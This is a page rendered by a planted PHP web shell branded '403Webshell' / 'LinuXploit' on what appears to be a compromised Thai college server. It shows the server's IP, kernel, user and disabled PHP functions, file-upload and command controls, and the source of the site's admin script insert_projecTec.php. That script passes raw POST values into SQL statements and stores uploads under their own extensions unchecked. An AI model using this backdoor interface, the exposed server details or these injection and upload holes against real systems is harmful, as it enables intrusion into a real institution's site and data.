403Webshell
Server IP : 202.29.229.35  /  Your IP : 3.17.73.197
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin//insert_projecTec.php
<?php 
session_start();
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}

		include('connect/connect.php');
		//include('connect/function.php');
		$selectUser=$_POST['selectUser'];
		$pro_fname=$_POST['pro_fname'];
		$pro_lname=$_POST['pro_lname'];
		$detail=$_POST['detail'];
		$dp_id=$_SESSION['r_workId'];
		$adID=$_SESSION['r_adID'];
		
		$filedocument1=$_FILES['filedocument1']['tmp_name'];
		$filedocument1_name=$_FILES['filedocument1']['name'];
		if($filedocument1 <> ""){
			$ext1=strtolower(end(explode('.',$filedocument1_name)));
			if($file_size1=checkdownfilepdfpro($ext1)){
				}
		}
		$filedocument2=$_FILES['filedocument2']['tmp_name'];
		$filedocument2_name=$_FILES['filedocument2']['name'];
		if($filedocument2 <> ""){
			$ext2=strtolower(end(explode('.',$filedocument2_name)));
			if($file_size2=checkdownfilepdfpro($ext2)){
				}
		}
		$filedocument3=$_FILES['filedocument3']['tmp_name'];
		$filedocument3_name=$_FILES['filedocument3']['name'];
		if($filedocument3 <> ""){
			$ext3=strtolower(end(explode('.',$filedocument3_name)));
			if($file_size3=checkdownfilepdfpro($ext3)){
				}
		}
		$filedocument4=$_FILES['filedocument4']['tmp_name'];
		$filedocument4_name=$_FILES['filedocument4']['name'];
		if($filedocument4 <> ""){
			$ext4=strtolower(end(explode('.',$filedocument4_name)));
			if($file_size4=checkdownfilepdfpro($ext4)){
				}
		}
		$filedocument5=$_FILES['filedocument5']['tmp_name'];
		$filedocument5_name=$_FILES['filedocument5']['name'];
		if($filedocument5 <> ""){
			$ext5=strtolower(end(explode('.',$filedocument5_name)));
			if($file_size5=checkdownfilepdfpro($ext5)){
				}
		}
		
		$filedocument6=$_FILES['filedocument6']['tmp_name'];
		$filedocument6_name=$_FILES['filedocument6']['name'];
			$ext6=strtolower(end(explode('.',$filedocument6_name)));
		if($filedocument6 <> ""){	
			if($file_size6=checkdownfilepdfpro($ext6)){
				}
		}
		$filedocument7=$_FILES['filedocument7']['tmp_name'];
		$filedocument7_name=$_FILES['filedocument7']['name'];
		if($filedocument7 <> ""){
			$ext7=strtolower(end(explode('.',$filedocument7_name)));
			if($file_size7=checkdownfilepdfpro($ext7)){
				}
		}
		$filedocument8=$_FILES['filedocument8']['tmp_name'];
		$filedocument8_name=$_FILES['filedocument8']['name'];
		if($filedocument8 <> ""){
			$ext8=strtolower(end(explode('.',$filedocument8_name)));
			if($file_size8=checkdownfilepdfpro($ext8)){
				}
		}
		$filedocument9=$_FILES['filedocument9']['tmp_name'];
		$filedocument9_name=$_FILES['filedocument9']['name'];
		if($filedocument9 <> ""){
			$ext9=strtolower(end(explode('.',$filedocument9_name)));
			if($file_size9=checkdownfilepdfpro($ext9)){
				}
		}
		$filedocument10=$_FILES['filedocument10']['tmp_name'];
		$filedocument10_name=$_FILES['filedocument10']['name'];
		if($filedocument10 <> ""){
			$ext10=strtolower(end(explode('.',$filedocument10_name)));
			if($file_size10=checkdownfilepdfpro($ext10)){
				}
		}
		/*
		$filedocument11=$_FILES['filedocument11']['tmp_name'];
		$filedocument11_name=$_FILES['filedocument11']['name'];
		if($filedocument11 <> ""){
			$ext11=strtolower(end(explode('.',$filedocument11_name)));
			if($file_size11=checkdownfilepdfpro($ext11)){
				}
		}
		*/
		$titleFile1=$_POST['title_file1'];
		$titleFile2=$_POST['title_file2'];
		$titleFile3=$_POST['title_file3'];
		$titleFile4=$_POST['title_file4'];
		$titleFile5=$_POST['title_file5'];
		$titleFile6=$_POST['title_file6'];
		$titleFile7=$_POST['title_file7'];
		$titleFile8=$_POST['title_file8'];
		$titleFile9=$_POST['title_file9'];
		$titleFile10=$_POST['title_file10'];
		
			if($detail ==""){
				echo "<script language='javascript'>alert('กรุณาพิมพ์รายละเอียดโดยสังเขปด้วย')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=projecTec">';
				exit();
			}
			/*
			if($filedocument11_name ==""){
				echo "<script language='javascript'>alert('กรุณาแนบไฟล์เอกสาร (.pdf) ด้วยครับ')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=projecTec">';
				exit();
			}
		*/
			
		$date=date('Y:m:d');
		$sql="insert into tblproject_techer values (null,'$pro_fname','$pro_lname','$detail','$date','$titleFile1','','$titleFile2','','$titleFile3','','$titleFile4','','$titleFile5','','$titleFile6','','$titleFile7','','$titleFile8','','$titleFile9','','$titleFile10','','$selectUser','$dp_id','$adID')";
		//echo "sql++>".$sql."<br>";
		$result=mysqli_query($connect1,$sql);
		if($result){
			
		$sqlsel="select max(p_ID) from tblproject_techer";
		$resultsel=mysqli_query($connect1,$sqlsel);
		$rssel=mysqli_fetch_array($resultsel);
			$projectIDmax=$rssel[0];// เก็บค่า news_id สูงสุด
			
			//echo "รหัสล่าสุด==>".$projectIDmax."<br>";
				if($filedocument1<>""){
					$filedocument_ori1="1"."_".$projectIDmax.'.'.$ext1;
				}else{
					$filedocument_ori1="";
				}
				if($filedocument2<>""){
					$filedocument_ori2="2"."_".$projectIDmax.'.'.$ext2;
				}else{
					$filedocument_ori2="";
				}
				if($filedocument3<>""){
					$filedocument_ori3="3"."_".$projectIDmax.'.'.$ext3;
				}else{
					$filedocument_ori3="";
				}
				if($filedocument4<>""){
					$filedocument_ori4="4"."_".$projectIDmax.'.'.$ext4;
				}else{
					$filedocument_ori4="";
				}
				if($filedocument5<>""){
					$filedocument_ori5="5"."_".$projectIDmax.'.'.$ext5;
				}else{
					$filedocument_ori5="";
				}
				if($filedocument6<>""){
					$filedocument_ori6="6"."_".$projectIDmax.'.'.$ext6;
				}else{
					$filedocument_ori6="";
				}
				if($filedocument7<>""){
					$filedocument_ori7="7"."_".$projectIDmax.'.'.$ext7;
				}else{
					$filedocument_ori7="";
				}
				if($filedocument8<>""){
					$filedocument_ori8="8"."_".$projectIDmax.'.'.$ext8;
				}else{
					$filedocument_ori8="";
				}
				if($filedocument9<>""){
					$filedocument_ori9="9"."_".$projectIDmax.'.'.$ext9;
				}else{
					$filedocument_ori9="";
				}
				if($filedocument10<>""){
					$filedocument_ori10="10"."_".$projectIDmax.'.'.$ext10;
				}else{
					$filedocument_ori10="";
				}
		
		$sqlupdate="update tblproject_techer set p_file1='$filedocument_ori1',";
		$sqlupdate.="p_file2='$filedocument_ori2',";
		$sqlupdate.="p_file3='$filedocument_ori3',";
		$sqlupdate.="p_file4='$filedocument_ori4',";
		$sqlupdate.="p_file5='$filedocument_ori5',";
		$sqlupdate.="p_file6='$filedocument_ori6',";
		$sqlupdate.="p_file7='$filedocument_ori7',";
		$sqlupdate.="p_file8='$filedocument_ori8',";
		$sqlupdate.="p_file9='$filedocument_ori9',";
		$sqlupdate.="p_file10='$filedocument_ori10' ";
		$sqlupdate.="where p_ID='$projectIDmax' ";
		$resultupdate=mysqli_query($connect1,$sqlupdate);
		//echo "add file==>".$sqlupdate;

				if($filedocument1 <>""){
				copy($filedocument1,"file_project/$filedocument_ori1");
				}
				if($filedocument2 <>""){
				copy($filedocument2,"file_project/$filedocument_ori2");
				}
				if($filedocument3 <>""){
				copy($filedocument3,"file_project/$filedocument_ori3");
				}
				if($filedocument4 <>""){
				copy($filedocument4,"file_project/$filedocument_ori4");
				}
				if($filedocument5 <>""){
				copy($filedocument5,"file_project/$filedocument_ori5");
				}
				if($filedocument6 <>""){
				copy($filedocument6,"file_project/$filedocument_ori6");
				}
				if($filedocument7 <>""){
				copy($filedocument7,"file_project/$filedocument_ori7");
				}
				if($filedocument8 <>""){
				copy($filedocument8,"file_project/$filedocument_ori8");
				}
				if($filedocument9 <>""){
				copy($filedocument9,"file_project/$filedocument_ori9");
				}
				if($filedocument10 <>""){
				copy($filedocument10,"file_project/$filedocument_ori10");
				}


				echo "<script language='javascript'>alert('บันทึกข้อมูลเรียบร้อยแล้ว')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=projectTec_s">';
			}else{
				echo "<script language='javascript'>alert('ไม่สามารถบันทึกข้อมูลได้')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=projecTec">';
				}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit